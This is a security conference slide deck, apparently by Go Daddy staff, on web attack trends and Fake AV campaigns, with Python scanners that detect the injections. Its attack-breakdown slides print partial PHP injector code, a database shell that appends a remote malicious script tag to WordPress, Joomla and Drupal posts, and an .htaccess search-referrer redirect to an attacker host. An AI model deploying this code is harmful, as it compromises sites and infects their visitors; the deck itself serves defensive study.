Ganesh Devarajan & Todd Redfoot. Introduction Todd Redfoot Chief Information Security Officer ...

Post on 01-Apr-2015


KEEPING UP WITH THE WEB APPLICATION SECURITY

Ganesh Devarajan & Todd Redfoot

Introduction

Todd Redfoot Chief Information Security Officer

Ganesh Devarajan Sr. Security Architect

The Background

(What does Go Daddy do?)

What does Go Daddy do?

9.4 Million Customers
48 Million Domains Under Management
Over 5 million Active Hosting Accounts
1/3 of all DNS queries run through our servers
We register, renew or transfer more than one domain name every second

What does Go Daddy do?

40+ Security Professionals in Team
24 x 7 Operations Center
Research
Engineering
Forensics
Customer Security Advisors
Penetration Testing
User Administration
Development

The Numbers

(What does Go Daddy see?)

What do we see?

Monitor over 100,000 events per second (8.6 Billion/Day)

DDoS - ~900 Attacks per day / 6K per week
Feb 2011 - Largest attack @ 21M pps
Last Week – 40G Attack

Brute Force – 3.5M per hour

What do we see?

“Other” Attacks:
425K – Invalid Directory Traversal
90K – XSS Prevention
115K – SQL Injection Prevention

… all in a 24 hour period…

Current Trends

SSH Brute Forcers (by country): US 54%, CN 20%, KR 6%, BG 4%, AR 4%, TW 3%, FR 2%, JP 2%, CA 2%, BR 2%

SSH Brute Forcers: Englewood, Colorado, 140 Million attempts

MS-SQL Brute Forcers (by country): US 65%, CN 24%, TR 5%, CA 2%, (-) 1%, KR 1%, TH 1%, RU 0%, VN 0%, IE 0%

MS-SQL Brute Forcers: Orlando, FL, 348 Million attempts

My-SQL Brute Forcers (by country): US 78%, CN 12%, CA 4%, SE 2%, FR 2%, MY 1%, PH 1%, IN 0%, JP 0%, KR 0%

FTP Brute Forcers (by country): CN 66%, US 26%, HK 2%, CA 2%, IE 2%, TW 1%, KR 1%, RS 0%, DE 0%, BR 0%

FTP Brute Forcers: XingPing, CN, 12 Million attempts

Brute Forcers - All (by country): US 61%, CN 27%, TR 4%, KR 2%, CA 2%, (-) 1%, BG 1%, TH 1%, AR 1%, TW 1%

Brute Forcers - US: Garden City, NY, 75.7 Million attempts

Brute Forcers - CN: Datong, CN, 22.5 Million attempts

Brute Forcinator

SQL Injection (by country): US 41%, CN 28%, BG 9%, UK 5%, ID 4%, NL 4%, CZ 3%, JP 3%, AU 2%, FR 2%

SQL Injection: Seattle, WA, 1.3 Million attempts

Backdoor Shells (by country): US 87%, ID 4%, NG 2%, UK 2%, CN 1%, CA 1%, DE 1%, BR 1%, NL 1%, AL 0%

Backdoor Shells: Phone Company (91%), Mountain View, CA

PHP Attacks (by country): US 65%, KR 8%, FR 6%, RU 4%, DE 3%, LU 3%, UK 3%, BR 3%, CA 2%, NL 2%

PHP Attacks: Berlin, Germany, 1.9 Million attempts

PHP Attacks: Montreal, CA, 1.1 Million attempts

Botnet (by country): US 52%, UK 7%, KR 6%, PL 6%, FR 6%, DE 6%, CA 6%, RU 5%, NL 4%, AU 3%

Botnet – Source: https://zeustracker.abuse.ch/

Botnet – Source: http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps

Phishing

The Good, Bad and Ugly?

The Bad – Most Events

The Ugly – Security Events & DDoS

New Trends

Recent Changes

“Hacktivists”: Lulzsec = Twitter, ComodoHacker = Pastebin

Phishing -> Spear Phishing

Targeted & Coordinated Attacks

RSA / Lockheed Martin Connection

What’s in the News?

More Client-side Exploits: Browser exploits, Adobe exploits

Web Server Compromises: Brute Force Attacks, Leveraging Web Application Vulnerabilities, Config files with passwords

More of the same…

Scareware: reports fake viruses to users, then asks for a fee to remove the threat

Paying does nothing but give them your CC#. $10 Million in Revenue last year

Fake AV

Fake AV Analysis (diagram; node labels follow)

$$$$$$
<html>Holy Crap! Infected! Click Here to clean</html>
GET http://intermediary.com/ll.php
Make HTTP calls to infection script and site is infected
Compromised Attack Server(s)
Servers with Compromised Accounts (Zeus/Phishing/etc)
FTP/SSH Upload of Attack Shell/Script
Casual Web User Visits Infected Site
End Users
Fake AV Basterds
<script>http://intermediary.com/ll.php</script>
Disposable Domain Name
Registrant: Hilary Kneber hilarykneber@yahoo.com 7569468 fax: 756946829/2 Sun street. Montey 29 Virginia NA 3947

Fake AV – Attack Breakdown

$z=$_SERVER["DOCUMENT_ROOT"];                 // web root of the compromised hosting account
$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';   // obfuscated PHP stub to be injected (payload elided on the slide)
@unlink($_SERVER['SCRIPT_FILENAME']);         // the uploaded script deletes itself to hide its presence
$val=$z;
$totalinjected=0;
echo "Working with $val\n!!STARTING!!";
ob_flush();
$start_time=microtime(true);
if ($val!="")do_folder($val);                 // walks the document root and injects $encoded (do_folder not shown on the slide)
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";

Fake AV – Sample Shell

$insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';   // tag appended to every content row
...
$link=mysql_connect($host,$user,$pass);       // $host/$user/$pass are set in the elided part of the shell
if (!$link) {
    die('Could not connect: ' . mysql_error());
}else{
    echo 'Connected successfully'."\n";
    $db_list = mysql_list_dbs($link);         // enumerate every database the account can reach
    $bases = array();
    while ($row = mysql_fetch_object($db_list)) {
        $bases[]=$row->Database;
    }
// per database/table loop elided; $bases[$i] and $table come from it.
// Each branch appends the tag to the CMS content column so it renders on every page.
//wordpress
if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; }
//joomla
if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')"; }
//drupal
if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2"; }
if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')"; }

Fake AV – DB Variant
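The DB variant appends a remote script tag to CMS content columns, so a defender can find it by scanning those same columns. The following Python scanner is an added example, not code from the slides or from Go Daddy: it reports script tags loading from hosts outside an allowlist and can strip them; the table names, hostnames and sample rows are constructed.

```python
import re

# Content columns the DB variant targets, keyed by table-name suffix: WordPress
# *_posts.post_content, Joomla *_content.introtext, Drupal node_revisions.body, *_post.title.
TARGET_COLUMNS = {"_posts": "post_content", "_content": "introtext",
                  "node_revisions": "body", "_post": "title"}

# The injector appends <script src="http://host/js.php?kk=N"></script> to the field.
# Match any remotely sourced, empty-bodied script tag and capture its host.
REMOTE_SCRIPT = re.compile(
    r"""<script\s+src=["'](https?://([^/"'\s]+)[^"']*)["'][^>]*>\s*</script>""", re.I)

def column_for(table: str):
    """Column the injector would have written to, or None for tables it ignores."""
    for suffix, column in TARGET_COLUMNS.items():
        if table.endswith(suffix):
            return column
    return None

def find_injected_scripts(rows: list, allowed_hosts: list) -> list:
    """rows: (table, primary_key, {column: value}) tuples. Returns one finding per
    remote script tag whose host is not in allowed_hosts (the site's own CDN, analytics)."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for table, pk, values in rows:
        column = column_for(table)
        if column is None or column not in values:
            continue
        for m in REMOTE_SCRIPT.finditer(values[column]):
            host = m.group(2).lower()
            if host not in allowed:
                findings.append({"table": table, "id": pk, "column": column,
                                 "host": host, "tag": m.group(0)})
    return findings

def clean_field(value: str, allowed_hosts: list) -> str:
    """Strip tags from non-allowlisted hosts so a reviewed row can be written back."""
    allowed = {h.lower() for h in allowed_hosts}
    return REMOTE_SCRIPT.sub(lambda m: m.group(0) if m.group(2).lower() in allowed else "", value)

# Constructed sample rows; the hostnames are placeholders, not taken from the slides.
INJECTED = '<script src="http://injected.example/js.php?kk=26"></script>'
SAMPLE_ROWS = [
    ("wp_posts", 1, {"post_content": "Hello world" + INJECTED}),
    ("jos_content", 7, {"introtext": 'Welcome<script src="https://cdn.example/app.js"></script>'}),
    ("node_revisions", 3, {"body": "About us" + INJECTED}),
    ("wp_users", 2, {"user_login": "admin" + INJECTED}),  # not a content table: ignored
]
```

Run it against a dump of the hosting account's databases rather than the live tables, and review each finding before writing the cleaned field back.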

Fake AV - Search Redirect

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]
</IfModule>

addhandler x-httpd-php-cgi .php4
addhandler x-httpd-php5-cgi .php5
addhandler x-httpd-php5-cgi .php
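The .htaccess above has a recognisable shape: a run of HTTP_REFERER conditions naming search engines, then a RewriteRule that sends those visitors to an external host, plus AddHandler lines that re-map PHP. The following Python checker for that shape is an added example, not from the slides; the sample .htaccess and the host redirect.example are constructed.

```python
import re

# Search engines named in the referrer conditions of the .htaccess on the slide.
SEARCH_ENGINES = ("ask.com", "google", "msn.com", "bing.com", "live.com",
                  "aol.com", "altavista.com", "excite.com", "search.yahoo")

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(https?://([^/\s]+)\S*)\s*\[([^\]]*)\]", re.I)
HANDLER_RE = re.compile(r"^\s*AddHandler\s+(\S+)\s+(.+)$", re.I)

def analyze_htaccess(text: str, site_hosts: list) -> list:
    """Flag a RewriteRule that sends search-engine-referred visitors off-site, and any
    AddHandler that re-maps PHP. site_hosts: hosts the site may legitimately redirect to."""
    allowed = {h.lower() for h in site_hosts}
    findings = []
    search_conds = 0  # RewriteConds on HTTP_REFERER naming a search engine, so far
    for lineno, line in enumerate(text.splitlines(), 1):
        if (m := COND_RE.match(line)):
            if any(engine in m.group(1).lower() for engine in SEARCH_ENGINES):
                search_conds += 1
            continue
        if line.lstrip().lower().startswith("rewriterule"):
            m = RULE_RE.match(line)
            if m:
                pattern, _target, host, flags = m.groups()
                redirect = any(f.strip().upper().startswith("R") for f in flags.split(","))
                if search_conds and redirect and host.lower() not in allowed:
                    findings.append({"line": lineno, "type": "search_referrer_redirect",
                                     "detail": f"{search_conds} search-engine referrer conds send '{pattern}' to {host}"})
            search_conds = 0  # RewriteConds apply only to the next RewriteRule
            continue
        if (m := HANDLER_RE.match(line)) and "php" in m.group(1).lower():
            findings.append({"line": lineno, "type": "php_handler_override",
                             "detail": f"{m.group(1)} mapped to {m.group(2).strip()}"})
    return findings

# Constructed sample mirroring the slide's structure; the redirect host is a placeholder.
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://redirect.example/in.php?g=1 [R,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L]
</IfModule>
AddHandler x-httpd-php5-cgi .php
"""
```

The legitimate front-controller rule in the sample produces no finding; a PHP handler override can be legitimate on some shared hosts, so it is reported for review rather than treated as proof of compromise.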

Custom Monitoring

UDP Flooder

How to Protect?

Website Vulnerability Scanners:
Website Protection - Site Scanner ($48/Year)
Beyond Security ($99.95/Year)
McAfee Secure™ (~$2100/Year)
WhiteHat Security®
IBM AppScan®
Cenzic®
HP WebInspect®

Web Based Malware Detection:
Virtual machine honey pots – monitor creation of new processes, file system or registry entries, etc.
Browser emulation
Reputation service – the Internet’s black list

Signature Based Detection/Prevention:
Intrusion Detection System/Intrusion Prevention System
Anti-Virus

New Methodologies

Questions?

Thank You

Ganesh Devarajan gdevarajan@godaddy.com

Todd Redfoot todd@godaddy.com